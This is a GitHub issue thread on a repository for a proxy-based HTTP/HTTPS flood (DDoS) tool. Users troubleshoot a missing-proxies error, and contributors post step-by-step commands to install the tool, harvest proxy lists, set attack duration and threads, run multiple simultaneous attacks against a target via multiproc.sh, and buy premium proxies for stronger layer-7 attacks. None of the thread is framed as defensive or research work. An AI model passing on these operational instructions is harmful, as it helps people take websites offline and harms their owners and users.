Leeon123 / CC-attack

Using Socks4/5 or http proxies to make a multithreading Http-flood/Https-flood (cc) attack.
GNU General Public License v2.0
942 stars 416 forks source link

Proxies file not found #80

Open Autopowermta opened 2 years ago

Autopowermta commented 2 years ago

Hi Old version working fine when I was updated new version getting below error how to fix please help me Proxies file not found

https://ibb.co/7X6bGK9

Leeon123 commented 2 years ago

what is your command

ThomasCFelix commented 2 years ago

Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check Then use multiproc.sh for attack.

Autopowermta commented 2 years ago

Hi python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600

I tried like this no use

Autopowermta commented 2 years ago

python3 cc.py -url http://website.com -v 5 -s 60 python3 cc.py -url http://website.com -v 4 -s 60

I tried getting same error Proxies file not found

Leeon123 commented 2 years ago

Did you download proxies

Leeon123 commented 2 years ago

Please read it https://github.com/Leeon123/CC-attack#usage

Autopowermta commented 2 years ago

Mode: [cc/post/head]

Checking list Number Of Proxies: 343 Building threads... Flooding...

after then quitting

Leeon123 commented 2 years ago

Defualt attack time is 60 seconds

Leeon123 commented 2 years ago

If you want to set it longer, use -s \<time>

gizliag commented 2 years ago

hello @Leeon123 teacher I am trying your tools but I don't know what the command to run is can you explain in detail about adding proxy and starting the attack

Leeon123 commented 2 years ago

@gizliag Is the usage not enough clear? What do you not understand? Please tell me

gizliag commented 2 years ago

@gizliag Is the usage not enough clear? What do you not understand? Please tell me

Sir, I couldn't understand proxy transfer, then I did not understand how we can run these tools, so if you prepare a syntax, it will be easier. @Leeon123

ThomasCFelix commented 2 years ago

Enter the following commands in the linux terminal

  1. pip3 install requests pysocks
  2. git clone https://github.com/Leeon123/CC-attack.git
  3. cd CC-attack
  4. python3 cc.py -url https://google.com/ -v 5 -down -check -s 1 After receiving the proxies list with above command, you can use this command python3 cc.py -url https://google.com/ -v 5 -s 60 for sending attack. If you want to send multiple attacks at the same time, do the following. open multiproc.sh change http://target.com to your target website and change -v 4 to -v 5 atk_cmd="python3 cc.py -url http://target.com -v 5 -s 60" You can use pkill python3 command to stop running attacks.
gizliag commented 2 years ago

@ThomasCFelix

Sir, first of all, thank you, I was able to do the attack, but I have only one question in mind

https://camo.githubusercontent.com/edd974e1c4cd72a0db0639f1f5af56cc7cf3584b688575419d9e5692dc937c46/68747470733a2f2f692e696d6775722e636f6d2f4b4c4a495a73382e706e67

There are 200 thousand attacks on this link, but there are 100 attacks on mine, how can I do this? Do I need to use vds/vps?

ThomasCFelix commented 2 years ago

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

jkeridLNX3 commented 2 years ago

python3 cc.py -url http://website.com -v 5 -s 60 python3 cc.py -url http://website.com -v 4 -s 60

I tried getting same error Proxies file not found try this python3 cc.py -url https://target.com -v 5 -down -check -t 800 -s 61

jkeridLNX3 commented 2 years ago

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

give me link premium proxy

ThomasCFelix commented 2 years ago

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

give me link premium proxy

Do you have a telegram id?

jkeridLNX3 commented 2 years ago

@parkos123

On Wed, 20 Apr 2022 at 04:19, ThomasCFelix @.***> wrote:

For layer 7 attacks, 4 factors are involved in the power of attacks. 1. Porxy List 2. Network Speed 3. CPU 4. RAM If you want to send strong attacks, you should purchase premium proxies

give me link premium proxy

Do you have a telegram id?

— Reply to this email directly, view it on GitHub https://github.com/Leeon123/CC-attack/issues/80#issuecomment-1103094466, or unsubscribe https://github.com/notifications/unsubscribe-auth/AUHQDC7DBT5PXBZRJKWVXGLVF4ILVANCNFSM5SH6Z2QA . You are receiving this because you commented.Message ID: @.***>

swordapi commented 2 years ago

Use this command first to get proxies: python3 cc.py -url https://google.com -v 5 -down -check Then use multiproc.sh for attack.

You dont even need a target and v 5 ist default

swordapi commented 2 years ago

Hi python start.py bomb https://mywebsite.com 0 50 proxy.txt 100 3600

I tried like this no use

This wont work

swordapi commented 2 years ago

Mode: [cc/post/head]

Checking list Number Of Proxies: 343 Building threads... Flooding...

after then quitting

Default time is 60s you can chamgw it with -s (seconds) or edit default in cc.py